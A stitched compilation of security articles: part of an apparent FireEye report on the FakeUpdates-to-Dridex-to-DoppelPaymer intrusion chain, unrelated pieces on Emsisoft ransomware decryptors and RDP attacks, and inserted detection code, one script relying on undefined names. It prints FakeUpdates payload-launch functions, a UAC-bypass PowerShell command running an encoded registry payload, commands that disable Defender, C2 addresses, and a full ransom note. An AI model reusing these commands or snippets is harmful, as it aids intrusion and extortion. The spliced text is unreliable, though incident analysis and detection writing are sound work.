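# Constructed input reproducing the Figure 6 layout, including the wrapped
# process list on the last line.
SAMPLE_RECORD = r"""0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe
"""


def parse_inventory(blob):
    """Turn the numbered key=value record into a dict of named fields."""
    raw = {}
    last = None
    for line in blob.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition("=")
        if sep and key.isdigit():
            last = int(key)
            raw[last] = value
        elif last is not None:
            # A line without "N=" is the continuation of a wrapped list.
            raw[last] += line
    out = {}
    for idx, value in raw.items():
        name = FIELD_NAMES.get(idx, f"field_{idx}")
        if idx in LIST_FIELDS:
            out[name] = [v.strip() for v in value.split("|") if v.strip()]
        else:
            out[name] = value
    return out


def triage(inv):
    """Summarise the fields a responder acts on first."""
    procs = inv.get("processes", [])
    script = inv.get("script_path", "")
    av = set(inv.get("av_products", [])) | set(inv.get("av_products_alt", []))
    return {
        "host": f"{inv.get('domain', '?')}\\{inv.get('hostname', '?')}",
        "user": inv.get("user"),
        "script_in_user_temp": "\\AppData\\Local\\Temp\\" in script,
        "dropper_name": script.rsplit("\\", 1)[-1],
        "av": sorted(av),
        "process_count": len(procs),
        "duplicate_process_names": sorted({p for p in procs if procs.count(p) > 1}),
    }


if __name__ == "__main__":
    for key, value in triage(parse_inventory(SAMPLE_RECORD)).items():
        print(f"{key}: {value}")
```

The dropper name and path (a Chrome.js in the user's Temp directory) and the anti-virus list are the two items worth pivoting on immediately: the former gives a file to hunt for across the estate, the latter tells you which product's logs to pull for the initial execution.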

After receiving the system information, the C2 server responds with an encoded payload delivered to the infected system via chunked transfer-encoding, a technique that can evade IDS/IPS appliances which do not reassemble chunked bodies, allowing the second-stage payload to download successfully. During our investigations and FireEye Intelligence’s monitoring, we recovered encoded payloads that delivered one of the following:

  • Dridex (Figure 7)
  • NetSupport Manager Remote Access Tool (RAT) (Figure 8)
  • Chthonic or AZORult (Figure 9)

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            wsh.Run('cmd /C rename "' + _tempFilePathSave + '" "' + execFileName + '"');
            WScript.Sleep(3 * 1000);
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 7: Code excerpt observed in FakeUpdates used to launch Dridex payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '" /verysilent');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 8: Code excerpt observed in FakeUpdates used to launch NetSupport payloads

    function runFile() {
        var lastException = '';
        try {
            var wsh = new ActiveXObject("WScript.Shell");
            runFileResult = wsh.Run('"' + _tempFilePathExec + '"');
            lastException = '';
        } catch (error) {
            lastException = error.number;
            runFileExeption += 'error number:' + error.number + ' message:' + error.message;
        }
    }

Figure 9: Code excerpt observed in FakeUpdates used to launch Chthonic and AZORult payloads

During this process, the victim system downloads and executes nircmdc.exe, a utility specifically used during the infection process to save two system screenshots. Figure 10 provides an example command used to capture the desktop screenshots.

"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"

Figure 10: Sample command used to execute the Nircmd tool to take desktop screenshots

The PNG screenshots of the infected systems are then transferred to the C2 server, after which they are deleted from the system. Figure 11 provides an example of an HTTP POST request, again with the custom Age and User-Agent headers.


Figure 11: Screenshots of the infected system are sent to an attacker-controlled C2

Interestingly, the screenshot file transfers were neither encoded nor obfuscated, as with other data elements transferred by the FakeUpdates malware. As soon as the screenshots are transferred, nircmdc.exe is deleted.

All Hands on Deck

In certain investigations, the incident was far from over. Following the distribution of Dridex v4 binaries (botnet IDs 199 and 501), new tools and frameworks began to appear. FireEye identified that the threat actors leveraged their Dridex backdoor(s) to execute the publicly available PowerShell Empire and/or Koadic post-exploitation frameworks. Managed Defense also identified the FakeUpdates-to-Dridex infection chain resulting in the download and execution of PoshC2, another publicly available tool. While it could be coincidental, it is worth noting that the use of PoshC2 was first observed in early September 2019, following the announcement that Empire would no longer be maintained, and could represent a shift in attacker TTPs. These additional tools were often executed between 30 minutes and 2 hours after the initial Dridex download. The pace of the initial phases of related attacks suggests that automated post-compromise techniques are used, at least in part, before interactive operator activity occurs.

We identified extensive usage of Empire and C2 communication to various servers during these investigations. For example, via process tracking, we identified a Dridex-injected explorer.exe executing malicious PowerShell: a clear sign of an Empire stager:


Figure 12: An example of PowerShell Empire stager execution revealed during forensic analysis

In the above example, the threat actors instructed the victim system to use the remote server 185.122.59[.]78 for command-and-control using an out-of-the-box Empire agent C2 configuration for TLS-encrypted backdoor communications.

During their hands-on post-exploitation activity, the threat actors also moved laterally via PowerShell remoting and RDP sessions. FireEye identified the use of WMI to create remote PowerShell processes, subsequently used to execute Empire stagers on domain-joined systems. In one specific case, the time delta between initial Empire backdoor and successful lateral movement was under 15 minutes. Another primary goal for the threat actor was internal reconnaissance of both the local system and domain the computer was joined to. Figure 13 provides a snippet of Active Directory reconnaissance commands issued by the attacker during one of our investigations.


Figure 13: Attacker executed commands

The threat actors used an Empire module named SessionGopher and the venerable Mimikatz to harvest endpoint session and credential information. Finally, we also identified the attackers utilized Empire’s Invoke-EventVwrBypass, a Windows bypass technique used to launch executables using eventvwr.exe, as shown in Figure 14.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x


Figure 14: PowerShell event viewer bypass

Ransomware Attacks & Operator Tactics

Within these investigations, FireEye identified the deployment of BitPaymer or DoppelPaymer ransomware. While these ransomware variants are highly similar, DoppelPaymer uses additional obfuscation techniques. It also has enhanced capabilities, including an updated network discovery mechanism and the requirement of specific command-line execution. DoppelPaymer also uses a different encryption and padding scheme.

The ransomware and additional reconnaissance tools were downloaded through public file-sharing sites such as DropMeFiles and SendSpace. Irrespective of the ransomware deployed, the attacker used the Sysinternals utility PsExec to distribute and execute the ransomware.

Notably, in the DoppelPaymer incident, FireEye identified that Dridex v2 with the Botnet ID 12333 was downloaded onto the same system previously impacted by an instance of Dridex v4 with Botnet ID 501. Within days, this secondary Dridex instance was then used to enable the distribution of DoppelPaymer ransomware. Prior to deploying DoppelPaymer, the threat actor deleted volume shadow copies and disabled anti-virus and anti-malware protections on select systems. Event log artifacts revealed the commands executed through PowerShell which were used to achieve this step (Figure 15):

Event Log                                 | EID  | Message
Microsoft-Windows-PowerShell%4Operational | 600  | HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
Microsoft-Windows-PowerShell%4Operational | 600  | HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender
Application                               | 1034 | Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82.

Figure 15: Event log entries related to the uninstallation of AV agents and disablement of real-time monitoring
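The host artifacts in Figures 10, 14 and 15 (the nircmdc.exe screenshot command, the eventvwr.exe-parented PowerShell reading an encoded command from the registry, and the PowerShell/Application log entries that disable or remove AV) are all simple to express as detection logic. The block below is an added example, not FireEye's signatures: it runs a handful of rules over constructed event records that imitate Sysmon process-creation (EID 1), PowerShell Operational (EID 600) and Application (EID 1034) entries. The dictionary field names and the benign control record are assumptions; the command lines and messages are the ones shown in the figures above.

```python
"""Detection rules for the FakeUpdates/Dridex host artifacts, run over
constructed sample events.

Added example, not FireEye's detection content. Event field names
(log, eid, image, parent_image, command_line, message) are assumptions;
the command lines and messages come from Figures 10, 14 and 15 above.
"""
import re

# Constructed sample events; paths are the ones from the figures, the last
# record is a benign control (an admin running a normal cmdlet from cmd.exe).
SAMPLE_EVENTS = [
    {"log": "Sysmon", "eid": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\User\AppData\Local\Temp\nircmdc.exe",
     "command_line": r'"C:\Users\User\AppData\Local\Temp\nircmdc.exe" savescreenshot "C:\Users\User\AppData\Local\Temp\6206a2e3dc14a3d91.png"'},
    {"log": "Sysmon", "eid": 1, "parent_image": r"C:\Windows\System32\eventvwr.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x'},
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": "HostApplication=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"log": "Microsoft-Windows-PowerShell%4Operational", "eid": 600,
     "message": "HostApplication=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender"},
    {"log": "Application", "eid": 1034,
     "message": "Windows Installer removed the product. Product Name: McAfee Agent-++-5.06.0011-++-1033-++-1603-++-McAfee, Inc.-++-(NULL)-++--++-. Product Version: 82."},
    {"log": "Sysmon", "eid": 1, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-MpComputerStatus"},
]


def _text(ev):
    """Command line for process events, message text for log entries."""
    return ev.get("command_line") or ev.get("message") or ""


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


# Each rule: (name, predicate). Security-product names in the last rule are
# an assumption; extend the list with whatever is deployed in the estate.
RULES = [
    ("FakeUpdates screenshot capture",
     lambda ev: ev.get("log") == "Sysmon" and ev.get("eid") == 1
     and _basename(ev.get("image", "")) == "nircmdc.exe"
     and "savescreenshot" in _text(ev).lower()),
    ("EventVwr parent process (UAC bypass)",
     lambda ev: ev.get("eid") == 1
     and _basename(ev.get("parent_image", "")) == "eventvwr.exe"
     and _basename(ev.get("image", "")) in ("powershell.exe", "cmd.exe")),
    ("Encoded PowerShell staged from registry",
     lambda ev: _basename(ev.get("image", "")) == "powershell.exe"
     and re.search(r"\s-e(nc|ncodedcommand)?\s", _text(ev), re.I)
     and re.search(r"HKCU:\\?Software\\Microsoft\\Windows Update", _text(ev), re.I)),
    ("Defender real-time monitoring disabled",
     lambda ev: re.search(r"Set-MpPreference\s.*-DisableRealtimeMonitoring\s+\$true", _text(ev), re.I)),
    ("Defender feature removed",
     lambda ev: re.search(r"Uninstall-WindowsFeature\s.*Windows-Defender", _text(ev), re.I)),
    ("Security product uninstalled (MSI 1034)",
     lambda ev: ev.get("log") == "Application" and ev.get("eid") == 1034
     and re.search(r"McAfee|Defender", ev.get("message", ""), re.I)),
]


def evaluate(events):
    """Return (event index, rule name) for every rule that fires on every event."""
    hits = []
    for idx, ev in enumerate(events):
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((idx, name))
    return hits


def summarize(events):
    """Sorted set of distinct rule names that fired; useful as a triage summary."""
    return sorted({name for _, name in evaluate(events)})


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Two design points: the eventvwr rule keys on the parent/child relationship rather than on any string in the command line, which is why it survives re-encoding of the payload; and the Defender rules match the cmdlet text wherever it appears (process command line or PowerShell EID 600/4104 text), since the page shows the commands surfacing in the PowerShell Operational log rather than in process creation.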

The DoppelPaymer ransomware was found in an Alternate Data Stream (ADS) in randomly named files on disk. ADSs are attributes within NTFS that allow for a file to have multiple data streams, with only the primary being visible in tools such as Windows Explorer. After ransomware execution, files are indicated as encrypted by being renamed with a “.locked” file extension. In addition to each “.locked” file, there is a ransom note with the file name “readme2unlock.txt” which provides instructions on how to decrypt files.


Figure 16: DoppelPaymer ransomware note observed during a Mandiant Incident Response investigation

Ransomware? Not In My House!

Over the past few years, we have seen ransomware graduate from a nuisance malware to one being used to extort victim networks out of significant sums of money. Furthermore, threat actors are now coupling ransomware with multiple toolkits or other malware families to gain stronger footholds into an environment. In this blog post alone, we witnessed a threat actor move through multiple toolsets - some automated, some manual - with the ultimate goal of holding the victim organization hostage.

Ransomware also raises the stakes for unprepared organizations as it levels the playing field for all areas of your enterprise. Ransomware proves that threat actors don’t need to get access to the most sensitive parts of your organization – they need to get access to the ones that will disrupt business processes. This widens your attack surface, but luckily, also gives you more opportunity for detection and response. Mandiant recently published an in depth white paper on Ransomware Protection and Containment Strategies, which may help organizations mitigate the risk of ransomware events.

Indicators

The following indicator set is a collective representation of artifacts identified during investigations into multiple customer compromises.

Type                              | Indicator(s)
FakeUpdates Files                 | 0e470395b2de61f6d975c92dea899b4f
                                  | 7503da20d1f83ec2ef2382ac13e238a8
                                  | 102ae3b46ddcb3d1d947d4f56c9bf88c
                                  | aaca5e8e163503ff5fadb764433f8abb
                                  | 2c444002be9847e38ec0da861f3a702b
                                  | 62eaef72d9492a8c8d6112f250c7c4f2
                                  | 175dcf0bd1674478fb7d82887a373174
                                  | 10eefc485a42fac3b928f960a98dc451
                                  | a2ac7b9c0a049ceecc1f17022f16fdc6
FakeUpdates Domains & IP Addresses | <8-Characters>.green.mattingsolutions[.]co
                                  | <8-Characters>.www2.haciendarealhoa[.]com
                                  | <8-Characters>.user3.altcoinfan[.]com
                                  | 93.95.100[.]178
                                  | 130.0.233[.]178
                                  | 185.243.115[.]84
                                  | gnf6.ruscacademy[.]in
                                  | backup.awarfaregaming[.]com
                                  | click.clickanalytics208[.]com
                                  | track.amishbrand[.]com
                                  | track.positiverefreshment[.]org
                                  | link.easycounter210[.]com
nircmdc.exe                       | 8136d84d47cb62b4a4fe1f48eb64166e
Dridex                            | 7239da273d3a3bfd8d169119670bb745
                                  | 72fe19810a9089cd1ec3ac5ddda22d3f
                                  | 07b0ce2dd0370392eedb0fc161c99dc7
                                  | c8bb08283e55aed151417a9ad1bc7ad9
                                  | 6e05e84c7a993880409d7a0324c10e74
                                  | 63d4834f453ffd63336f0851a9d4c632
                                  | 0ef5c94779cd7861b5e872cd5e922311
Empire C2                         | 185.122.59[.]78
                                  | 109.94.110[.]136

Detecting the Techniques

FireEye detects this activity across our platforms, including named detections for Dridex, Empire, BitPaymer and DoppelPaymer ransomware. As a result of these investigations, FireEye additionally deployed new indicators and signatures to Endpoint and Network Security appliances. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform          | Signature Name
Endpoint Security | HX Exploit Detection
                  | Empire RAT (BACKDOOR)
                  | EVENTVWR PARENT PROCESS (METHODOLOGY)
                  | Dridex (BACKDOOR)
                  | Dridex A (BACKDOOR)
                  | POWERSHELL SSL VERIFICATION DISABLE (METHODOLOGY)
                  | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
                  | FAKEUPDATES SCREENSHOT CAPTURE (METHODOLOGY)
Network Security  | Backdoor.FAKEUPDATES
                  | Trojan.Downloader.FakeUpdate
                  | Exploit.Kit.FakeUpdate
                  | Trojan.SSLCert.SocGholish

MITRE ATT&CK Technique Mapping

ATT&CK               | Techniques
Initial Access       | Drive-by Compromise (T1189), Exploit Public-Facing Application (T1190)
Execution            | PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)
Persistence          | DLL Search Order Hijacking (T1038)
Privilege Escalation | Bypass User Account Control (T1088), DLL Search Order Hijacking (T1038)
Defense Evasion      | Bypass User Account Control (T1088), Disabling Security Tools (T1089), DLL Search Order Hijacking (T1038), File Deletion (T1107), Masquerading (T1036), NTFS File Attributes (T1096), Obfuscated Files or Information (T1027), Scripting (T1064), Virtualization/Sandbox Evasion (T1497)
Credential Access    | Credential Dumping (T1003)
Discovery            | Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Share Discovery (T1135), Process Discovery (T1057), Remote System Discovery (T1018), Security Software Discovery (T1063), System Information Discovery (T1082), System Network Configuration Discovery (T1016), Virtualization/Sandbox Evasion (T1497)
Lateral Movement     | Remote Desktop Protocol (T1076), Remote File Copy (T1105)
Collection           | Data from Local System (T1005), Screen Capture (T1113)
Command And Control  | Commonly Used Port (T1436), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Data Obfuscation (T1001), Remote Access Tools (T1219), Remote File Copy (T1105), Standard Application Layer Protocol (T1071)
Exfiltration         | Automated Exfiltration (T1020), Exfiltration Over Command and Control Channel (T1041)
Impact               | Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), Service Stop (T1489)

Acknowledgements

A huge thanks to James Wyke and Jeremy Kennelly for their analysis of this activity and support of this post.

Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

The decryption tool should be used only after the victim has successfully removed the malware from the system; otherwise the Avest ransomware may repeatedly lock the machine or encrypt files again.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

The post Emsisoft released a new free decryption tool for the Avest ransomware appeared first on Security Affairs.

Critical Infrastructure Technology (ICIT) highlights ransomware and RDP access as the current focus

The Institute for Critical Infrastructure Technology (ICIT), in a paper warning of the evolution of what it calls “disruptionware”, points to ransomware and RDP access as the current focus of a new development which “sees adversaries interrupting business continuity,” posing “an existential threat to key infrastructure operators.”

The move from random to targeted attacks is underlined. It rests on two factors: the industry’s reluctance to close RDP, and the remarkable degree of access RDP offers the attacker. On the first point, for instance, ICIT notes (PDF) that “805,665 systems remain vulnerable to the BlueKeep RDP operation, with an estimated 105,170 systems based in the US, notwithstanding months of warning as of July 2, 2019.”

RDP provides full remote control over the accessed device. “While the victim determines whether or not to pay the ransom,” says ICIT, “the opponent retains system access, enabling them to install backdoors, remote Trojans or other malware that can make future attacks easier or provide service to other attackers.”

The industry’s reluctance to shut RDP down is due to its value as a remote maintenance tool. “Manual maintenance is deemed too expensive compared to remote access solutions, especially if the systems are located overseas,” says ICIT.

In a separate study (PDF), the security firm Vectra points out that RDP allows a centralized maintenance team to simultaneously monitor and fix systems at various factories. “The cost savings on this are substantial,” it says, noting that every trip a technician makes for an on-site machine fix is estimated to cost more than $2,000.

It also notes that the access provided by RDP is so extensive that a ransomware attack is not the first motive but the last effect. Vectra analyzed the RDP problem in the context of its own telemetry. “Having gained access to the infrastructure, reconnoitered the network, moved laterally through it, and exfiltrated all they want,” Vectra head of security analytics Chris Morales said, “ransomware could be the final act to get as much money as possible.”

Over six months, between January and June 2019, its Cognito threat detection and response platform detected 26,800 malicious RDP behaviors against customers. These are classified as pre-access (the system detects repeated brute-force attempts against RDP) or post-access (where machine learning detects suspicious behavior, such as attempts to use an unexpected keyboard language).
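The “pre-access” class described above, repeated failed RDP logons from one source, is something a SIEM can surface from the Windows Security log without any vendor platform. The block below is an added example, not Vectra's code: it slides a time window over constructed 4625 (logon failure) records per source address, raises an alert once a threshold is crossed, flags many distinct target accounts as likely password spraying, and records whether a 4624 (logon success) from the same source followed the burst. The sample records, thresholds and the choice of logon types (10 for RemoteInteractive; 3 is included because failed RDP logons are commonly recorded as network logons when NLA is on) are assumptions to tune for a real environment.

```python
"""Sliding-window detection of RDP brute force from Windows Security 4625
events, with a follow-up check for a 4624 success from the same source.

Added example, not Vectra's detection logic. SAMPLE_EVENTS is constructed;
the logon-type set, threshold and window are assumptions to tune.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Logon types treated as RDP: 10 = RemoteInteractive; 3 = Network, which is
# what failed RDP attempts usually log as when NLA is enabled (assumption).
RDP_LOGON_TYPES = {10, 3}

# Constructed records: (timestamp, event_id, logon_type, source_ip, target_user)
SAMPLE_EVENTS = [
    ("2019-06-01T02:00:00", 4625, 10, "203.0.113.10", "administrator"),
    ("2019-06-01T02:00:02", 4625, 10, "203.0.113.10", "admin"),
    ("2019-06-01T02:00:04", 4625, 10, "203.0.113.10", "user"),
    ("2019-06-01T02:00:07", 4625, 10, "203.0.113.10", "test"),
    ("2019-06-01T02:00:09", 4625, 10, "203.0.113.10", "backup"),
    ("2019-06-01T02:00:12", 4625, 10, "203.0.113.10", "administrator"),
    ("2019-06-01T02:00:15", 4624, 10, "203.0.113.10", "backup"),  # success after burst
    ("2019-06-01T02:10:00", 4625, 10, "198.51.100.7", "jdoe"),    # two typos, benign
    ("2019-06-01T02:10:30", 4625, 10, "198.51.100.7", "jdoe"),
    ("2019-06-01T02:15:00", 4625, 2, "-", "svc_backup"),          # console logon, not RDP
]


def detect_rdp_bruteforce(events, threshold=5, window_seconds=60, spray_accounts=3):
    """Return {source_ip: alert} for sources with >= threshold failed RDP
    logons inside any window of window_seconds.

    Each alert records the failure count in the triggering window, the window
    bounds, the distinct accounts tried, a spray flag, and the account of any
    later successful RDP logon from the same source (None if there was none).
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # source_ip -> (timestamp, user) within window
    alerts = {}
    for ts_text, eid, ltype, ip, user in sorted(events, key=lambda e: e[0]):
        if ltype not in RDP_LOGON_TYPES:
            continue
        ts = datetime.fromisoformat(ts_text)
        if eid == 4624:
            # A success from a source already alerted on is the high-fidelity case.
            if ip in alerts and alerts[ip]["followed_by_success"] is None:
                alerts[ip]["followed_by_success"] = user
            continue
        if eid != 4625:
            continue
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            accounts = sorted({u for _, u in q})
            alerts[ip] = {
                "failures": len(q),
                "first": q[0][0].isoformat(),
                "last": ts.isoformat(),
                "accounts": accounts,
                "spray": len(accounts) >= spray_accounts,
                "followed_by_success": alerts.get(ip, {}).get("followed_by_success"),
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(ip, alert)
```

Sorting by timestamp before evaluation matters when events are collected from several hosts with different forwarding delays; the deque keeps only the failures inside the window, so memory stays bounded per source even on a long-running stream.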

By normalizing these figures, Vectra found that manufacturing (20%), finance (16%) and retail (14%) were the three most affected industries, followed by government (12%), healthcare (10%) and services (8%). The incidence of attacks against the services industry is notable. Morales said the Texas ransomware attacks came through the victims’ MSP. “With many MSPs using RDP to access their clients, this is a worrying threat vector,” he said.

Not all RDP attacks are necessarily linked to potential ransomware attacks; a criminal or a nation state seeking PII or industrial espionage access might be involved. However, the high incidence of RDP detections against manufacturing correlates with the increase in ransomware against manufacturing in 2019.

ICIT notes that LockerGoga ransomware alone is responsible for attacks on “Altran, the Norwegian aluminum manufacturer Norsk Hydro, the American chemical companies Hexion and Momentive.” Its principal concern is that increasing industrial digitalisation means that IT and OT can no longer be treated as separate entities, and that IT attacks via RDP are not possible.

The problem is that RDP is deemed too valuable to give up. Microsoft could update the software to require a strong password, but this could cause problems for existing customers already using weaker passwords. “It has introduced 2FA,” Morales said, “but it’s not installed by default.” The user therefore has the responsibility to secure RDP and defend it from attacks.

ICIT suggests that RDP (port 3389) needs to be evaluated and that, if necessary, connections from specific trusted hosts should be whitelisted and all others blocked. “Any system requiring an open RDP port,” says Vectra, “should go behind the firewall and require VPN users. You should also conduct regular inspection to ensure that the RDP port is not open to the public Internet.”
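The “regular inspection” Vectra asks for can be automated against an exported rule table: every rule that allows TCP/3389 is checked against the trusted-source allowlist (VPN pool, jump hosts) and anything wider is reported. The block below is an added example, not ICIT's or Vectra's tooling; the rule table, the trusted networks and the tuple layout are constructed and would be replaced by the export format of the firewall in use.

```python
"""Audit firewall rules for RDP (TCP/3389) exposure against a trusted-source
allowlist. Added example; rule format and networks are constructed.
"""
import ipaddress

# Trusted RDP sources (constructed): a VPN address pool and one jump host.
TRUSTED_SOURCES = [
    ipaddress.ip_network("10.20.0.0/24"),
    ipaddress.ip_network("192.0.2.50/32"),
]

# Constructed rule table: (name, action, protocol, dest_port, source_cidr).
# dest_port 0 and protocol "any" mean "all ports" / "all protocols".
SAMPLE_RULES = [
    ("allow-rdp-from-vpn", "allow", "tcp", 3389, "10.20.0.0/24"),
    ("allow-rdp-jump", "allow", "tcp", 3389, "192.0.2.50/32"),
    ("legacy-vendor-rdp", "allow", "tcp", 3389, "0.0.0.0/0"),
    ("contractor-rdp", "allow", "tcp", 3389, "203.0.113.0/24"),
    ("allow-https", "allow", "tcp", 443, "0.0.0.0/0"),
    ("deny-all", "deny", "any", 0, "0.0.0.0/0"),
]


def rule_reaches_rdp(action, proto, port, rdp_port=3389):
    """True if the rule permits traffic that could reach the RDP port."""
    return action == "allow" and proto in ("tcp", "any") and port in (rdp_port, 0)


def audit_rdp_rules(rules, trusted=TRUSTED_SOURCES, rdp_port=3389):
    """Return (rule name, finding) for every allow rule exposing RDP beyond
    the trusted sources. A 0.0.0.0/0 source is reported as fully exposed."""
    findings = []
    for name, action, proto, port, src in rules:
        if not rule_reaches_rdp(action, proto, port, rdp_port):
            continue
        net = ipaddress.ip_network(src, strict=False)
        if net.prefixlen == 0:
            findings.append((name, "RDP exposed to any source"))
        elif not any(net.version == t.version and net.subnet_of(t) for t in trusted):
            findings.append((name, f"RDP allowed from untrusted source {src}"))
    return findings


if __name__ == "__main__":
    for name, finding in audit_rdp_rules(SAMPLE_RULES):
        print(f"{name}: {finding}")
```

The check treats a source network as acceptable only if it sits entirely inside one trusted network; a rule whose source merely overlaps the VPN pool is still reported, which is the conservative reading of “specific trusted hosts whitelisted, all others blocked”.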

But Vectra points out that standard defenses don’t work properly against zero-day exploits. “In August 2019,” it notes, “Microsoft announced four new critical vulnerabilities for RDP, which are all ‘pre-authentication’, which means that they may be executed without proper credentials or victim input. It is striking that these exploits have worked for Windows 7, 8, and 10. Since Windows 10 is currently the latest and most popular Windows operating system, this indicates that RDP attacks persist even as organizations update their IT systems.”

Vectra’s view is that RDP is such a dangerous threat vector that users should not rely on defenses that can be overcome, but rather on behavior-based detection by a modern threat detection system.

 

The post Critical Infrastructure Technology (ICIT) highlights ransomware and RDP access as the current focus appeared first on .

Emsisoft releases a free decryptor for the WannaCryFake ransomware

Researchers at Emsisoft security firm have released a new free decryption tool for the WannaCryFake ransomware.

Good news for the victims of the WannaCryFake ransomware: researchers at Emsisoft have released a free decryption tool that will allow them to decrypt their data.

WannaCryFake is a piece of ransomware that uses AES-256 to encrypt a victim’s files. The ransomware appends the following file extension to encrypted files:

“.[<id>][recoverydata54@protonmail.com].WannaCry”

“According to the ransomware distributors, the price of decryption depends on how quickly you email them, but under no circumstances should you attempt to make contact.” states the post published by Emsisoft.

The ransom note dropped by the WannaCryFake ransomware states:

All your files have been encrypted!

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail recoverydata54@protonmail.com

also You can use telegram ID:@data54

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files.

Free decryption as guarantee

Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)

How to obtain Bitcoins

The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click ‘Buy bitcoins’, and select the seller by payment method and price.

Also you can find other places to buy Bitcoins and beginners guide here: http://www.coindesk.com/information/how-can-i-buy-bitcoins/

Jabber client installation instructions:

Download the jabber (Pidgin) client from https://pidgin.im/download/windows/

After installation, the Pidgin client will prompt you to create a new account.

Click “Add”

In the “Protocol” field, select XMPP

In “Username” – come up with any name

In the field “domain” – enter any jabber-server, there are a lot of them, for example – exploit.im

Create a password

At the bottom, put a tick “Create account”

Click add

If you selected “domain” – exploit.im, then a new window should appear in which you will need to re-enter your data:

Userpassword

You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)

If you don’t understand our Pidgin client installation instructions, you can find many installation tutorials on youtube – https://www.youtube.com/results?search_query=pidgin+jabber+install

Attention!

Do not rename encrypted files.

Do not try to decrypt your data using third party software, it may cause permanent data loss.

Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Victims of the malware can download the WannaCryFake Decryptor here.

“Regardless of what the ransom note might say, our decryption tool can help you recover your files for free and will not cause permanent data loss. Please get in touch with our support team if you have any questions.” concludes Emsisoft.

